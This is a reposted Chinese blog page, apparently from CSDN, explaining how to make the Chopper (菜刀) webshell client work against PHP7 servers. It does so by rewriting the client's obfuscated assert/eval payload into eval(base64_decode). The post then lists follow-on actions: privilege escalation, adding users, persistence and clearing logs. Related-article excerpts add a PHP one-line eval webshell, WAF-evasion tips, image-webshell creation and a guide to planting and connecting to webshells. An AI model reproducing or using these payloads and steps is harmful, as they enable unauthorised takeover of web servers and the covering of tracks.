菜刀连接一句话木马出现:`Cannot call assert() with string argument dynamically`错误

最新推荐文章于 2024-01-07 17:20:43 发布
转载 最新推荐文章于 2024-01-07 17:20:43 发布 · 2.8k 阅读 · 2 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/dotnetcrazy/p/11407505.html
文章标签:

#数据库 #运维 #php

本文详细介绍了菜刀这款经典的渗透测试工具在PHP7环境下遇到的兼容性问题,即“Cannotcallallas...,并给出了具体的解决方案,包括修改配置文件中的特定代码,以确保文件管理功能的正常使用。

前言

逆天还是上学那会玩渗透的,后来工作后就再也没碰了,所以用的工具还是以前经典款,这不,发现出问题了

问题

如果是PHP5则没有问题,如果是PHP7,会出现:Cannot call assert() with string argument dynamically的提示

1127869-20190825121926624-903638975.png

解决

用谷歌搜了下,发现了这篇解释:https://www.freebuf.com/articles/web/197013.html

1127869-20190825121932099-2132670185.png

知道了本质就简单了,菜刀这个软件之所以经典就是因为它的灵活性很强,修改下配置文件即可

PS:把array_map("ass"."ert",array("ev"."Al(\"\\\$xx%%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('%s'));\");"));改成eval(base64_decode('%s'));即可
1127869-20190825121937738-1056169889.png

这时候文件管理的功能就能使用了,下面就是常规操作了(文件上传下载、大马、提权、建用户、远程连接、权限维持、清日记...)

PS:copy数据库、网站,本地搭建一个和服务器一样的环境,进一步探索与发现~~~

1127869-20190825121942458-494492595.png

附录

菜刀下载:https://github.com/raddyfiy/caidao-official-version

取代菜刀:蚁剑https://github.com/AntSwordProject/AntSword-Loader or Cknifehttps://github.com/Chora10/Cknife

转载于:https://www.cnblogs.com/dotnetcrazy/p/11407505.html

LP890127
关注
一句话木马汇总:Web 安全中的隐形杀手,揭秘其关键函数、绕过 WAF 及防火墙的技巧
盾悟
03-21 8783
一句话木马是一种简短的恶意代码,通常用于 Web 渗透中,通过利用漏洞在服务器上执行任意命令。以下按编程语言详细说明其关键函数和作用。
eval与assert一句话木马分析
weixin_49472648的博客
07-23 2970
利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过蚁剑等webshell工具即可获取和控制整个网站目录。 一般的php一句话后门很容易被网站防火墙waf拦截,而waf通常通过判断关键字来辨别一句话木马,要想绕过waf就需要对木马进行一些变形。............
一句话php木马制作教程_菜刀无法正常访问一句话问题
weixin_35092037的博客
12-21 2007
今天自己搭建了一个php版的xss cookie接收平台。为了图操作上的方便,给自己的web放了一句话木马。但是当我打开菜刀连接时,报了500错误,如图想到可能是php版本问题导致这个问题的。查看了一下服务器上的php版本,7.0.33抓包查看菜刀数据: 去掉z0数据访问正常 那么问题点在z0数据了,解密z0数据: 看到解密后的z0数据,一下想到了...
菜刀连接PHP WebShell返回200错误
bloodzer0
06-17 6873
错误详情 WebShell内容: <?php @eval($_POST['cmd']); ?> 错误详情: 在Hackber或BurpSuite中却没有问题: 原因分析 PHP7版本过高,在PHP7中,动态调用一些函数是被禁止的,比如在array_map中调用assert会提示:Warning: Cannot call func_num_args() dynamically in %s on line %d 如果把一句话Shell中的@符号去掉,会提示:Cannot call as
动态调用函数时的命令执行对于eval()assert()的执行问题
Alexhirchi的博客
07-02 4039
前言 在做一道通过反序列化后动态调用函数的题目时,最后获取flag使用assertphpinfo() 构成的命令可以执行 但eval和phpinfo()无法执行 ,本来以为只是因为assert可以把字符串参数当php代码执行,而eval是只能对合法的php代码可以执行的问题的原因,但这解释总感觉怪怪的,后来查询了一些文档并进行本地测试发现其另有原因。 附上题目中的主要代码: class HelloPhp { public $a; public $b; public func
php简短一句话木马免杀,免杀/一句话木马(PHP)
weixin_39598568的博客
03-13 2910
前言在打CTF或渗透时,经常会遇到waf,普通的一句话木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握一句话木马的免杀。Webshell检测方式网上有很多免杀的一句话木马,但是如果不知道主流杀毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下一个payload。因此在此之前,先来了解一下都有哪些检测方式。日志检测使用Web...
一句话木马以及免杀
抚琴
01-08 4150
此篇只讨论php,其实原理是相同的,本文的思路依然适用于其他语言 WAF一般都是维护一个规则库,记录webshell常用的函数、方法等等,通过这个规则库匹配从而检测是否是木马.当匹配上对应特征时就是告警,但是规则匹配肯定会有误报,waf一直告警也很烦,所以waf一般会稳定为首要目标,也会放宽一下规则,这就是绕的基础 查杀软件我首先:D盾 『D盾_防火墙』专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计!限制了
thinkphpphp7环境下提示Cannot use ‘String’ as class name as it is reserved的解决方法
10-21
主要介绍了thinkphpphp7环境下提示Cannot use ‘String’ as class name as it is reserved的解决方法,涉及thinkPHP针对php7关键字判定的相关底层代码修改技巧,需要的朋友可以参考下
php strtoup,PHP 7 的几处函数安全小变化
weixin_39997443的博客
03-09 329
To Begin With最近在准备 LANCTF,想把环境迁移到 PHP 7,却想到一些 payload 失效了。想着什么时候总结成一个笔记,恰巧在 FB 发现有人写了一篇博文,拜读后结合 CTF 环境整理了一下,总体来说,弃用了较多不安全的使用方式,但运行环境未过多限制时仍可使用。测试环境docker pull php:7.3.3-apachedocker pull php:7.0-apach...
ctfshow WEB入门 文件上传151-170
byname1的博客
01-07 2017
只是过滤了分号,其他同上。php的最后一个分号可以省略。
信息安全小测试
Snow_224的博客
04-21 8208
信息安全知识小测试一、单选题答案 一、单选题 1.在mysql数据库,下列哪个库保存了mysql所有的信息? A. test B. information_schema C. performance_schema D. mysql 2.一般来说用户上网要通过因特网服务提供商,其英文缩写为: A.IDC B.ISP C.ASP D.ISO 3.在OSI七层参考模型中,工作在三层以上的网络设备是? A.集线器 B.网关 C.网桥 D.中继器 4.向有限的空间输入超长的字符串是哪—种攻击手段? A.缓冲区溢出 B
解决中国菜刀连接失败问题
Suuannnn的博客
11-07 8848
今天上传了一个一句话木马,但是怎么也连接不上,抓了个包发现我的php里面的代码出现了特殊字符。 原来原因就出在了编码上,于是我回去检查了一下自己的编码,原来是一不小心用了utf16,把他换回utf8就OK了,心酸!!记录一下 ...
菜刀连接图片一句话木马
热门推荐
qq_18831583的博客
04-22 2万+
1、先制作图片一句话木马: 找好一张图片如”fox.jpg“,并且准备好一句话脚本php文件fox.php,在图片所在文件夹打开cmd命令行,执行命令:copy fox.jpg/b+fox.php/a fox1.jpg,生成图片一句话文件fox1.jpg 接下来用notepad++打开fox1.php图片,看看一句话也没有写入到图片当中,如图,一句话已经写入刀图片当中: ...
ctf 命令执行总结
njqfb的博客
06-04 3170
命令执行绕过总结 linux系统查看文件命令 more 一页一页的显示文件内容 less 和more类似 head 只显示头几行 tail 只显示最后几行 nl 显示时还输出行号 tailf cat 由第一行开始显示内容,并将所有内容输出 tac 从最后一行倒序显示内容,并将所有内容输出 od 以二进制的方式读取内容 vi 编辑文件 vim 编辑文件,是vi的升级版 sort 将以默认的方式将文本文件的第一列以ASCI
CPP相关的常见错误(更新ing)
LP890127的博客
01-28 575
01.只允许在C99模式下使用 for 循环初始化申明 解决:指定下即可 gcc -o xxx -std=c99 02. 转载于:https://www.cnblogs.com/dotnetcrazy/p/8371255.html
远程桌面连接:出现身份验证错误 要求函数不受支持
LP890127的博客
09-23 275
打开组策略 如图设置一下即可 参考: https://support.microsoft.com/zh-cn/help/4093492/credssp-updates-for-cve-2018-0886-march-13-2018 WinServer2012 R2忘记密码的解决方案+远程连接另一种莫名其妙故障 http://www.cnblogs.com/dunitian/p/74...
PHP特性整合(PHP5.X到PHP7.1.x)
风.foxwho(神秘狐)
10-01 1万+
1PHP7 已经出来1年了,PHP7.1也即将和大家见面,这么多好的特性,好的方法,为什么不使用呢,也希望PHP越来越好。 在这里整理 PHP 5.1 ,PHP5.2,PHP5.3,PHP5.4,PHP5.5,PHP5.6 ,PHP7,PHP7.1 所有新特性,已备大家学习及使用
菜刀命令执行漏洞写入一句话木马实验
最新发布
03-19
### 菜刀工具命令执行漏洞实现一句话木马写入的方法 菜刀是一款用于管理基于PHP一句话木马的图形界面工具,其核心在于通过`eval()`函数执行远程传递的命令[^2]。以下是关于如何利用菜刀工具结合命令执行漏洞来写入一句话木马的具体方法: #### 利用过程详解 1. **寻找目标系统的漏洞** 首先需要找到目标系统中存在的命令执行漏洞或其他可以注入恶意代码的地方。这可能是一个未受保护的表单提交、动态参数处理不当等功能。 2. **编写一句话木马脚本** 一句简单的PHP木马通常如下所示: ```php <?php @eval($_POST['password']);?> ``` 这里`$_POST['password']`表示接收来自客户端发送的数据,并通过`@eval()`将其作为PHP代码运行。 3. **上传或植入木马到服务器** 如果存在文件上传漏洞,则可以通过修改HTTP请求头或者绕过MIME类型检测等方式上传上述PHP文件;如果没有直接上传途径,也可以尝试利用已知的安全缺陷(如SQL Injection, XSS等),将该段代码嵌入现有的合法页面中[^1]。 4. **配置并连接菜刀客户端** 安装好菜刀软件之后,在界面上填写刚才部署好的木马URL以及设置密码字段名(即上面例子中的`password`)。点击测试按钮验证连通性后即可获得对该站点的部分操作权限[^3]。 5. **扩展攻击行为** 成功建立会话之后,能够进一步实施更多危害动作比如读取敏感数据、删除重要资料甚至完全接管整个主机环境。值得注意的是某些高级防护机制可能会阻止常规手段下的反序列化触发或是特定语法结构识别失败等问题发生时可考虑替换其他形式的有效载荷加载方式例如使用`assert()`, `call_user_func_array()`等多种替代方案达到相同效果[^4]。 #### 注意事项 - 所有渗透活动都应在授权范围内进行,非法入侵他人计算机信息系统属于违法行为。 - 学习此类技术主要用于提高自我网络安全意识及防御能力而非恶意破坏用途。 ```python # 示例Python脚本模拟向服务端post数据的过程 import requests url = 'http://example.com/shell.php' # 替换为目标实际地址 data = {'password': 'phpinfo();'} # 设置payload内容 response = requests.post(url, data=data) print(response.text) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值